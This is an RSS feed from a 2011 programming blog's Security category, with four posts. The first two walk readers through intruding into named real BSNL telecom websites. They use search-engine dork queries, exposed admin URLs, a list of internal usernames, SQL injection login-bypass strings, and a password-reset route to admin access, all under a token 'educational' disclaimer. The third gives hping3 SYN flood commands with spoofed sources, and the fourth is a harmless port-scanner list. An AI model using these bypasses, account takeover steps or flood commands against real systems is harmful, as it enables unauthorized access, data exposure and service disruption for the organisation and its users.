<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Binary Tides &#187; Security</title>
	<atom:link href="http://www.binarytides.com/blog/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.binarytides.com/blog</link>
	<description>Socket Programming , Game Programming , PHP , Mysql , Ubuntu etc.</description>
	<lastBuildDate>Thu, 02 Feb 2012 09:31:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Hack Bsnl websites easily</title>
		<link>http://www.binarytides.com/blog/hack-bsnl-websites-easily/</link>
		<comments>http://www.binarytides.com/blog/hack-bsnl-websites-easily/#comments</comments>
		<pubDate>Sat, 19 Nov 2011 14:10:31 +0000</pubDate>
		<dc:creator>Binary Tides</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bsnl]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.binarytides.com/blog/?p=945</guid>
		<description><![CDATA[Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it. Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques. So Lets begin. Search this in google : inurl:bsnl.co.in/admin In the search results page go to second page. You would see [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<p>Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.</p>
<p>So Lets begin.</p>
<p>Search this in google :</p>
<p>inurl:bsnl.co.in/admin</p>
<p>In the search results page go to second page. You would see plenty of links of the type :</p>
<p><a target="_blank" href="http://www.billchn.bsnl.co.in/admin/" >www.billchn.bsnl.co.in/admin/</a></p>
<p>Open that link and you will see lots of source code files.</p>
<p>Many of the links on this page show good information like :</p>
<p>Payment information &#8211; <a target="_blank" href="http://www.billchn.bsnl.co.in/admin/consol.jsp" >http://www.billchn.bsnl.co.in/admin/consol.jsp</a><br />
Transaction information &#8211; <a target="_blank" href="http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp" >http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp</a><br />
Registered user page &#8211; <a target="_blank" href="http://www.billchn.bsnl.co.in/admin/registereduser.jsp" >http://www.billchn.bsnl.co.in/admin/registereduser.jsp</a></p>
<p>Even an administration page is available without login :<br />
<a target="_blank" href="http://billchn.bsnl.co.in/modifypassword.jsp" >http://billchn.bsnl.co.in/modifypassword.jsp</a><br />
and here :</p>
<p><a target="_blank" href="http://www.billchn.bsnl.co.in/selectmodifyoption.jsp" >http://www.billchn.bsnl.co.in/selectmodifyoption.jsp</a></p>
<p>Check out what can be hacked from there.</p>
<p>So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.</p>
<p>This is the login page :<br />
<a target="_blank" href="http://www.billchn.bsnl.co.in/adminlogin.html" >http://www.billchn.bsnl.co.in/adminlogin.html</a></p>
<p>Another google hack term :</p>
<p>site:bsnl.co.in inurl:admin</p>
<p>Search the above and you might get some more interesting links like :</p>
<p><a target="_blank" href="http://www.str.bsnl.co.in:8009/y_circulars_list_v.asp?showmaster=1&#038;categary=Admin" >http://www.str.bsnl.co.in:8009/y_circulars_list_v.asp?showmaster=1&#038;categary=Admin</a></p>
<p><a target="_blank" href="http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=5&#038;selected_year=2005&#038;selected_c_institute_cd=TINST_26&#038;selected_faculty=admin" >http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=5&#038;selected_year=2005&#038;selected_c_institute_cd=TINST_26&#038;selected_faculty=admin</a></p>
<p>http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&#038;selected_faculty=admin</p>
<p>http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&#038;selected_faculty=DE+ADMIN</p>
<p>http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&#038;selected_faculty=DE+ADMIN</p>
<p>http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&#038;selected_faculty=admin</p>
<p><a target="_blank" href="http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=11&#038;selected_year=2001&#038;selected_c_institute_cd=&#038;selected_faculty=ALL" >http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=11&#038;selected_year=2001&#038;selected_c_institute_cd=&#038;selected_faculty=ALL</a></p>
<p>The above links appear to be : should have been password protected but they are publicly visible.</p>
<h3>Want to hack more ?</h3>
<p>Search for this :</p>
<p>site:bsnl.co.in inurl:login</p>
<p>and you will find urls like :</p>
<p><a target="_blank" href="http://mpintranet.bsnl.co.in/wireless/login.asp" >http://mpintranet.bsnl.co.in/wireless/login.asp</a><br />
<a target="_blank" href="http://mpintranet.bsnl.co.in/fbooking/login.asp" >http://mpintranet.bsnl.co.in/fbooking/login.asp</a></p>
<p>all the above urls are vulnerable to sql injection. Enter the following as both username and password :</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1</p>
<p>and you should be logged in. Happy Hacking!!</p>
<p>Try this url :<br />
<a target="_blank" href="http://udaan.bsnl.co.in/" >http://udaan.bsnl.co.in/</a></p>
<p>with username/password as :</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1&#8242; &#8212; &#8216;</p>
<p>Here is a screenshot :</p>
<p><a href="http://www.binarytides.com/blog/hack-bsnl-websites-easily/udaan_bsnl/"  rel="attachment wp-att-981"><img src="http://www.binarytides.com/blog/wp-content/uploads/2011/11/udaan_bsnl-600x292.png" alt="" title="udaan.bsnl.co.in/udaan_home.php" width="600" height="292" class="aligncenter size-medium wp-image-981" /></a></p>
<h3>Want to hack more ? Still not satisfied ? OK</h3>
<p>Open this url :</p>
<p><a target="_blank" href="http://www.vas.bsnl.co.in/stm/index.jsp" >http://www.vas.bsnl.co.in/stm/index.jsp</a></p>
<p>and login with</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1&#8242; &#8212; &#8216;</p>
<p>as username and password , and you would be logged in as admin. Here is a screenshot :</p>
<p><a href="http://www.binarytides.com/blog/hack-bsnl-websites-easily/vas_bsnl/"  rel="attachment wp-att-978"><img src="http://www.binarytides.com/blog/wp-content/uploads/2011/11/vas_bsnl-600x432.png" alt="" title="vas.bsnl.co.in/stm/index.jsp" width="600" height="432" class="aligncenter size-medium wp-image-978" /></a></p>
<p>Funny isn&#8217;t it ?</p>
<p>Want another website ? Sure :</p>
<p><a target="_blank" href="http://www.civil.bsnl.co.in:8080/civilbsnl/login.jsp" >http://www.civil.bsnl.co.in:8080/civilbsnl/login.jsp</a></p>
<p>Login with :</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1&#8242; &#8212; &#8216;</p>
<p>as the username and abcd as the password. You should get logged in and the Administration Panel should be available.<br />
Here is a screenshot :</p>
<p><a href="http://www.binarytides.com/blog/hack-bsnl-websites-easily/civil_bsnl/"  rel="attachment wp-att-998"><img src="http://www.binarytides.com/blog/wp-content/uploads/2011/11/civil_bsnl-600x602.png" alt="" title="civil_bsnl" width="600" height="602" class="aligncenter size-medium wp-image-998" /></a></p>
<p>Well done once again Bsnl!!</p>
<p>References :</p>
<p>1. SQL Injection Tutorial : <a target="_blank" href="http://en.wikipedia.org/wiki/SQL_injection" >http://en.wikipedia.org/wiki/SQL_injection</a></p>
<p><b>Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<img src="http://www.binarytides.com/blog/?ak_action=api_record_view&id=945&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.binarytides.com/blog/hack-bsnl-websites-easily/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Bsnl helpdesk application hacked</title>
		<link>http://www.binarytides.com/blog/bsnl-helpdesk-application-hacked/</link>
		<comments>http://www.binarytides.com/blog/bsnl-helpdesk-application-hacked/#comments</comments>
		<pubDate>Sat, 19 Nov 2011 12:43:53 +0000</pubDate>
		<dc:creator>Binary Tides</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[bsnl]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.binarytides.com/blog/?p=923</guid>
		<description><![CDATA[Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it. Bsnl hosts a helpdesk application at : http://dotsoft.bsnl.co.in/helpdesk Doing a search on google for : inurl:dotsoft.bsnl.co.in/helpdesk/moduser.asp reveals around 225 links of users of the system. Some urls are : http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jalnadotsoft http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=review http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sdebhr http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBASOL http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=pramarao http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jmndba http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbcdotsoft http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hacked%20by http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=aowl http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ramanap http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mbn http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cpadma http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbatrich http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=chauhanak http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=BISHNOI http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbamr http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jrbarod [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<p>Bsnl hosts a helpdesk application at :</p>
<p>http://dotsoft.bsnl.co.in/helpdesk</p>
<p>Doing a search on google for :</p>
<p>inurl:dotsoft.bsnl.co.in/helpdesk/moduser.asp</p>
<p>reveals around 225 links of users of the system.</p>
<p>Some urls are :</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jalnadotsoft</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=review</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sdebhr</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBASOL</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=pramarao</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jmndba</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbcdotsoft</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hacked%20by</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=aowl</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ramanap</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mbn</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cpadma</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbatrich</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=chauhanak</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=BISHNOI</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbamr</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jrbarod</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gmtdjbp</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htddba</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htd</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=helpdesk</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=qwert12345</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cjjoshi</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=APDBARTG</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=elrdba</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mramaiah</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=shalini</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gaurav</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ndshah</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DDNBSNL</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=s1ckyyyy</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nskdotsoft</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hitic</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=trp</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmjrt_tra</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBAMRT</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=reetagreenday</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asrdotsoft</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mssrama</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBADKL</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbagulbarga</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sanmalkani</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=robin</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asalgotra</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=avinash</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ngd</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ashu.yad111</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nlr</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ubuntu</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=GOADBA</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gtr</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbafbd</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmtez_tra</p>
<p>The link is meant to change the user details and should have been password protected. But they dont appear to be so. If any of the above urls work , then the password can be changed , and then the same password can be used to login in the application at this url <a target="_blank" href="http://dotsoft.bsnl.co.in/helpdesk/default.asp" >http://dotsoft.bsnl.co.in/helpdesk/default.asp</a>.</p>
<p>But this is just part of it. Doing a more generic search on Google will reveal even more remarkable results.</p>
<p>Doing a search for this url on google as follows :</p>
<p>inurl:dotsoft.bsnl.co.in/helpdesk</p>
<p>The above will show links of applications internal pages like &#8220;Problem Details&#8221; which are publicly visible and accessible. The vulnerable urls are publicly available on google search results as well. </p>
<p>Some links are :</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=70322001&#038;sby=decomp%20%20%20%20%20%20%20%20%20%20%20%20%20%20&#038;sto=rajesh</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=80524015&#038;sby=dbcdotsoft%20%20%20%20%20%20%20%20%20%20&#038;sto=wkgds</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=90622012&#038;sby=ddnbsnl%20%20%20%20%20%20%20%20%20%20%20%20%20&#038;sto=kgr</p>
<p>http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=81220006&#038;sby=ajdesai%20%20%20%20%20%20%20%20%20%20%20%20%20&#038;sto=kgr</p>
<p>and so on. </p>
<p>Another important link found by random browsing is :</p>
<p><a target="_blank" href="http://dotsoft.bsnl.co.in/helpdesk/viewreports.asp" >http://dotsoft.bsnl.co.in/helpdesk/viewreports.asp</a></p>
<p>It has links to various reports of the helpdesk application.</p>
<p>There is another helpdesk application being hosted at :<br />
<a target="_blank" href="http://ap.bsnl.co.in/mishelpdesk/admin.asp" >http://ap.bsnl.co.in/mishelpdesk/admin.asp</a></p>
<p>So searching for :<br />
inurl:ap.bsnl.co.in/mishelpdesk</p>
<p>will reveal lots of url meant to be password protected.</p>
<p>But <a target="_blank" href="http://ap.bsnl.co.in/mishelpdesk/admin.asp" >http://ap.bsnl.co.in/mishelpdesk/admin.asp</a> is vulnerable to simple sql inject as well.<br />
Simple enter any one of these following the password field :</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1<br />
&#8216; or &#8217;1&#8242;=&#8217;1&#8242; &#8212; &#8216;<br />
&#8216; or &#8217;1&#8242;=&#8217;1&#8242; ({ &#8216;<br />
&#8216; or &#8217;1&#8242;=&#8217;1&#8242; /* &#8216;</p>
<p>and you might get logged in.</p>
<h3>Getting admin access on the application</h3>
<p>1. First open any moduser link that works.</p>
<p>2. Now change password to &#8220;admin&#8221; and save.</p>
<p>3. Then login here http://dotsoft.bsnl.co.in/helpdesk/default.asp<br />
You should see this page :</p>
<p><a href="http://www.binarytides.com/blog/bsnl-helpdesk-application-hacked/user_login/"  rel="attachment wp-att-933"><img src="http://www.binarytides.com/blog/wp-content/uploads/2011/11/user_login.png" alt="" title="user_login" width="559" height="356" class="aligncenter size-full wp-image-933" /></a></p>
<p>4. After logging in open this page http://dotsoft.bsnl.co.in/helpdesk/logadmin.asp</p>
<p>You should see admin options :</p>
<p><a href="http://www.binarytides.com/blog/bsnl-helpdesk-application-hacked/admin_login/"  rel="attachment wp-att-934"><img src="http://www.binarytides.com/blog/wp-content/uploads/2011/11/admin_login.png" alt="" title="admin_login" width="576" height="438" class="aligncenter size-full wp-image-934" /></a></p>
<p>The application is in a pathetic condition. If you are a creative hacker then you may be able to hack out more from this system. Best of luck!!</p>
<p>Amazing stuff from Bsnl!!</p>
<p><b>Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<img src="http://www.binarytides.com/blog/?ak_action=api_record_view&id=923&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.binarytides.com/blog/bsnl-helpdesk-application-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TCP SYN flood DOS attack with hping</title>
		<link>http://www.binarytides.com/blog/tcp-syn-flood-dos-attack-with-hping/</link>
		<comments>http://www.binarytides.com/blog/tcp-syn-flood-dos-attack-with-hping/#comments</comments>
		<pubDate>Wed, 02 Nov 2011 13:04:07 +0000</pubDate>
		<dc:creator>Binary Tides</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Sockets]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.binarytides.com/blog/?p=717</guid>
		<description><![CDATA[Wikipedia defines hping as : hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using [...]]]></description>
			<content:encoded><![CDATA[<p>Wikipedia defines hping as :</p>
<blockquote><p>hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.</p></blockquote>
<p>Install hping on Ubuntu as :<br />
sudo apt-get install hping3</p>
<p>To send syn packets use the following command at terminal :</p>
<pre class="brush: bash; title: Code; notranslate">
sudo hping3 -i u1 -S -p 80 192.168.1.1
</pre>
<p>The above command would send TCP SYN packets to 192.168.1.1<br />
sudo is necessary since the hping3 create raw packets for the task , for raw sockets/packets root privilege is necessary on Linux.</p>
<p>S &#8211; indicates SYN flag<br />
p 80 &#8211; Target port 80<br />
i u1 &#8211; Wait for 1 micro second between each packet</p>
<p><em>More options</em></p>
<p>Sending N number of packets :</p>
<p>c &#8211; indicates the number of packets to send/receive</p>
<pre class="brush: bash; title: Code; notranslate">
$ sudo hping3 -i u1 -S -p 80 -c 10  192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes

--- 192.168.1.1 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
$
</pre>
<p>Other options from help :</p>
<pre class="brush: bash; title: Code; notranslate">
$ hping3 -help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size &gt; mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]&lt;port&gt; destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp-&gt;th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)
$
</pre>
<p>AS of version 3 hping now is scriptable using Tcl language and also has a shell for interactive commands.<br />
To send SYN packets :</p>
<pre class="brush: bash; title: Code; notranslate">
$ sudo hping3
hping3&gt; while {1} { hping send &quot;ip(saddr=1.2.3.4,daddr=192.168.1.1)+tcp(sport=4231,dport=80,flags=s)&quot; }
^Z
[2]+  Stopped                 sudo hping3
$
</pre>
<p>The above method allows for easier human readable packet crafting.</p>
<p>Use Wireshark to detect and analyse the packets send.</p>
<p>If you want to write your own code in C to send SYN packets check out this <a href="http://www.binarytides.com/blog/syn-flood-dos-attack/" >post</a></p>
<p>References :<br />
1. <a target="_blank" href="http://wiki.hping.org/" >http://wiki.hping.org/</a><br />
2. <a target="_blank" href="http://www.hping.org/manpage.html" >http://www.hping.org/manpage.html</a></p>
<img src="http://www.binarytides.com/blog/?ak_action=api_record_view&id=717&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.binarytides.com/blog/tcp-syn-flood-dos-attack-with-hping/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top Port Scanners on Ubuntu Linux</title>
		<link>http://www.binarytides.com/blog/top-port-scanners-on-ubuntu-linux/</link>
		<comments>http://www.binarytides.com/blog/top-port-scanners-on-ubuntu-linux/#comments</comments>
		<pubDate>Sun, 23 Oct 2011 14:00:43 +0000</pubDate>
		<dc:creator>Binary Tides</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.binarytides.com/blog/?p=605</guid>
		<description><![CDATA[Here is a list of port scanners that work on Ubuntu/Linux. 1. Angry IP Scanner Download and Install from http://www.angryip.org/ Fast and easy to use network scanner and port scanner. To scan ports got to Tools > Preferences > Ports > Port Selection Enter the ports you want to scan Start the scan. 2. nmap &#8211; network mapper Install : sudo apt-get install nmap Nmap is a utility for network exploration or security auditing. It [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a list of port scanners that work on Ubuntu/Linux.</p>
<p><strong>1. Angry IP Scanner</strong></p>
<p>Download and Install from <a target="_blank" href="http://www.angryip.org/" >http://www.angryip.org/</a><br />
Fast and easy to use network scanner and port scanner.</p>
<p>To scan ports got to Tools > Preferences > Ports > Port Selection<br />
Enter the ports you want to scan<br />
Start the scan.</p>
<p><img src="http://www.angryip.org/wiki/images/e/e4/Ipscan-linux.png" style="width:600px;"></p>
<p><strong>2. nmap &#8211; network mapper</strong></p>
<p>Install : sudo apt-get install nmap</p>
<blockquote><p>Nmap is a utility for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning techniques, version detection (determine service protocols and application versions listening behind ports), and TCP/IP fingerprinting (remote host OS or device identification). Nmap also offers flexible target and port specification, decoy/stealth scanning, sunRPC scanning, and more.</p></blockquote>
<p>Usage :</p>
<pre class="brush: cpp; title: Code; notranslate">

desktop:~$ nmap 192.168.1.2 -p1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-23 19:29 IST
Nmap scan report for 192.168.1.2
Host is up (0.00042s latency).
Not shown: 252 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
</pre>
<p>nmap also has with an easy to use GUI frontends :</p>
<p>1. <a target="_blank" href="http://nmap.org/zenmap/"  title="Zenmap">zenmap</a><br />
Install : sudo apt-get install zenmap</p>
<p>http://nmap.org/zenmap/</p>
<p><a target="_blank" href="http://nmap.org/zenmap/images/zenmap-no-648x700.png" ><img src="http://nmap.org/zenmap/images/zenmap-no-648x700.png" style="width:600px;"></a></p>
<p>2. Nmapsi4<br />
Install : sudo apt-get install nmapsi4</p>
<p>http://www.nmapsi4.org/</p>
<p><a target="_blank" href="http://nmapsi4.org/sites/all/fast_gallery/screenshot/0.2/snap11.png" ><img src="http://nmapsi4.org/sites/all/fast_gallery/screenshot/0.2/snap11.png" style="width:600px;"></a></p>
<p>3. Umit<br />
Install : sudo apt-get install umit</p>
<p>http://www.umitproject.org/</p>
